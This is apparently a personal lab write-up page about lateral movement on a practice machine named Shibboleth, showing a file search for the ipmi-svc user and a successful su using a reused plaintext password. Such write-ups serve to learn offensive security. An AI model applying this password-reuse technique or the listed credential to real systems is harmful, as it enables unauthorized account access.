InfoSec LAB

ipmi-svc

There is a Shibboleth, ipmi-svc.

zabbix@shibboleth:/etc/zabbix$ find / -user ipmi-svc -ls -type f 2>/dev/null
   397052      4 drwxr-xr-x   3 ipmi-svc ipmi-svc     4096 Oct 16  2021 /home/ipmi-svc
    23188      4 drwx------   2 ipmi-svc ipmi-svc     4096 Apr 27  2021 /home/ipmi-svc/.cache
   397329      4 -rw-rw-r--   1 ipmi-svc ipmi-svc       22 Apr 24  2021 /home/ipmi-svc/.vimrc
   397053      4 -rw-r--r--   1 ipmi-svc ipmi-svc      220 Apr 24  2021 /home/ipmi-svc/.bash_logout
   397054      4 -rw-r--r--   1 ipmi-svc ipmi-svc      807 Apr 24  2021 /home/ipmi-svc/.profile
   396864      0 lrwxrwxrwx   1 ipmi-svc ipmi-svc        9 Apr 27  2021 /home/ipmi-svc/.bash_history -> /dev/null
   397055      4 -rw-r--r--   1 ipmi-svc ipmi-svc     3771 Apr 24  2021 /home/ipmi-svc/.bashrc
   397276      4 -rw-r-----   1 ipmi-svc ipmi-svc       33 apr 17 18:26 /home/ipmi-svc/user.txt
   397057      0 lrwxrwxrwx   1 ipmi-svc ipmi-svc        9 Apr 28  2021 /home/ipmi-svc/.mysql_history -> /dev/null

It seems like there is no way to make lateral movement to the user as they aren’t any associated process or files

So I just decided to test for password reuse

zabbix@shibboleth:/etc/zabbix$ su ipmi-svc
password: ilovepumkinpie1
 
ipmi-svc@shibboleth:/etc/zabbix$ id
uid=1000(ipmi-svc) gid=1000(ipmi-svc) groups=1000(ipmi-svc)

and it worked. password reuse confirmed. Lateral movement made to the ipmi-svc user

InfoSec LAB

Explorer

Shibboleth_Lateral_Movement_ipmi-svc

ipmi-svc

Interactive Graph View

Backlinks